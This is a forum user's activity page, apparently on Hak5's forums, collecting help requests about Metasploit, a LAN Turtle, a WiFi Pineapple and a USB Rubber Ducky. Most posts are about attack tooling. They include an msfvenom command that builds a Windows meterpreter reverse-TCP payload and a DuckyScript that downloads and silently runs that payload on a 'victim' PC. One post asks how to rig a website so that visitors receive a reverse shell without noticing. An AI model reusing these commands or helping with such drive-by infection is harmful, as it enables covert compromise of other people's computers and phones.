Jump to content

hanshaze

Active Members
 View Profile  See their activity

  • Posts

    21

  • Joined

  • Last visited

 Content Type 

Posts posted by hanshaze

    why the duck dies my msf-session?

    in Metasploit Minute

    Posted

    Hi....

    im trying to "hack" my IOS 11 iPhone 5S with this settings in Metasploit 

    msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (apple_ios/aarch64/meterpreter_reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.178.179  yes       The listen address
   LPORT  443              yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target

    then i take my IOS Device, open Safari and visit the URL Metasploit shows me.....

    in my case this would be https://192.168.178.179:443

    if the Page opens Metasploit gives me this ---> 

    msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.178.179:443
[*] 192.168.178.23 - Meterpreter session 7 closed.  Reason: Died
[*] Meterpreter session 7 opened (127.0.0.1 -> 192.168.178.23:51820) at 2018-03-15 00:17:53 +0100
[*] Meterpreter session 8 opened (192.168.178.179:443 -> 192.168.178.23:51821) at 2018-03-15 00:17:55 +0100
[*] 192.168.178.23 - Meterpreter session 8 closed.  Reason: Died
[*] Meterpreter session 9 opened (192.168.178.179:443 -> 192.168.178.23:51822) at 2018-03-15 00:17:56 +0100
[*] 192.168.178.23 - Meterpreter session 9 closed.  Reason: Died
[*] 192.168.178.23 - Meterpreter session 10 closed.  Reason: Died
[*] Meterpreter session 10 opened (127.0.0.1 -> 192.168.178.23:51823) at 2018-03-15 00:17:57 +0100

    Whats the Problem?

    Should i forward Port 51820? Or which one i have to choose?

    Thanks for helping and stay wet!

    Click Link and be pwnd!!!

    in Questions

    Posted

    Hello everybody......

    I have recently added a domain and some webspace .....

    my goal is now to get a reverseshell to the visitor of that page!
    that means i have to infect this site in the way that if someone calls the he gets pwnd! and best without big spectacle and 3000 confirmations to be rallay really shure to install my trojan!

    My LHOST is a Pi 2 with Kali!

    To generate my code i use ps1encode!
    What output file format do i need to take? php? js? html? acab? Please help!
    On the server lie otherwise no further files!

    2. Question: How or where or with what do I hide the code properly?
    Is there something like a directive line?

    Do i MUST use beef-xss` or is there another way to bypass user-confirmation?

    who can help?

    Find the error......

    in LAN Turtle

    Posted · Edited by hanshaze

    Thanks for your answer......

    Yes, the LT is plugged to a direct power source.....

    So at least one of the two IPs should be achievable, but this is not the case...

    Do i have to forward Port 22 for 172.16.84.1? Or for 192.168.178.xx?

    For now this is the output of my screen

    neu.png

    Find the error......

    in LAN Turtle

    Posted · Edited by hanshaze

    My goal is to make my LanTurtle accessible over the entire LAN or the very best in the WAN.

    For this I proceed as follows

    Step 1: Without LanTurtle plugged in -> Windows 10 -> ipconfig

    001_ipconfig.png.9e1584822fcd5de30d7f54099a63829b.png

    Step 2: LanTurtle via Ethernet cable cable to the router, other side -->  USB at the laptop -> ipconfig

    002_ipconfig.png.c0fbe29ad7893eaefe276a67a8998e0c.png

     

    Step 3 SSH into the LanTurtle

    003_ssh.png.b43f1714d745c17fa6c264e449fbef44.png

    Step 4: Update modules

    004_turtle.thumb.png.0c4fe625124bdea5cf67c50af126e6ed.png

    005_turtle_ipconfig.png.f39c8bd33597b542dd08854f9318759f.png

    Now, if i plug out the LanTurtle after Step 4 and connect it to the LAN like in those two Pics below i cant receive the LanTurtle over LAN anything else....

    590807e29460a_WhatsAppImage2017-05-02at05_48.57(1).thumb.jpeg.9b8bfebfc16e259ce3b3758fbc3628c9.jpeg590807e60517c_WhatsAppImage2017-05-02at05_48_57.thumb.jpeg.94333fa655cbe6801cea511b1fbce6e5.jpeg

    What is my fault?

    005_turtle_ipconfig.png

    Pineapple Nano: No space left on device

    in WiFi Pineapple NANO

    Posted

     

    I hope someone can help ....

    I have a wifi pineapple nano,with a 16 gigabyte  sd card is!

    All modules installed on the nano have been installed in the sd-dir. Without exception!

    When I, however, via ssh 

    wget -qO- https://raw.githubusercontent.com/kbeflo/wifite-openwrt/master/INSTALL.sh | Bash -s - -v -v

     I received the message ---> on the device is no more space left! :ohmy:

    How do I clean up the pineapple-disk?

    and how do i install wifite in the sd dir?

    Respect for the entire hak5 workforce!

    You are mad! 

    Help with ReverseShell

    in Classic USB Rubber Ducky

    Posted

    Hi.......i have a problem, hope somebody can help me!

    Ok,.......

    I have created a Reverse TCP DNS payload with MSFVenom......

    Now i want to execute this File with plugging in the USB Rubber Ducky!

    How i got to do this?

    Do i have to convert my Payload with Base64?

    And if yes, how i could do this?

    Please help me!

    USB Rubber Ducky and Reverse TCP Payload

    in Classic USB Rubber Ducky

    Posted

    Hello....

    i have a question about the USB Rubber Ducky...
    Hope you can help me!

    My attack computer is a Raspberry Pi 2 with Raspbian installed.
    My victim PC is a Windows 10 Notebook.

    I want to get a meterpreter reverse tcp-session to my Raspberry Pi from the victim

    if i plug in my USB Rubber Ducky into the Windows PC.

    As i proceeded:

    1. i created the “payload.exe” on the Raspberry Pi
    ~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.35 LPORT=443 -f exe -o /home/pi/payload.exe
    UNaeYcl.png

    2. i created a listener file and run it on the Raspberry Pi
    ~$ sudo nano /home/pi/listener.rc

    2RKyZQf.png

    To test how things work I have saved the “payload.exe” on the victim machine's hdd and run it as the systemadministrator .
    This is was happened on the Pi's screen:

    RKKEOwO.png

    so far so good.....

    My idea now was to let the USB Rubber Ducky do two things for me after plug-in

    1. download my “payload.exe” from the internet
    2. install it on the victim-pc with admin rights

    so i created a “inject.bin” with the Duck Toolkit Encoder.
    This is the Code i used (changed the download URL to an existing)

    DELAY 500
    CONTROL ESCAPE
    DELAY 200
    STRING cmd.exe
    DELAY 100
    ENTER
    DELAY 500
    STRING cd %TEMP%
    DELAY 100
    ENTER
    DELAY 100
    STRING powershell (new-object System.Net.WebClient).DownloadFile('http://.....payload.exe,%TEMP%\payload.exe'); Start-Process "%TEMP%\payload.exe"
    DELAY 100
    ENTER
    DELAY 100
    ALT SPACE
    DELAY 50
    DOWN
    DELAY 50
    DOWN
    DELAY 50
    DOWN
    DELAY 50
    DOWN
    DELAY 50
    DOWN
    DELAY 50
    ENTER
    DELAY 50
    GUI d

    Now, the code runs through without any errors, if i plug in the Rubber Ducky.
    But the problem is that meterpreter gets no connection with the Ducky!

    Why my DuckyScript doesnt execute the downloaded file?
    I dont understand whats my fault!

    Whats wrong? Please help me!

    Greetings to Darren and the whole hak5-Team!

×
×
  • Create New...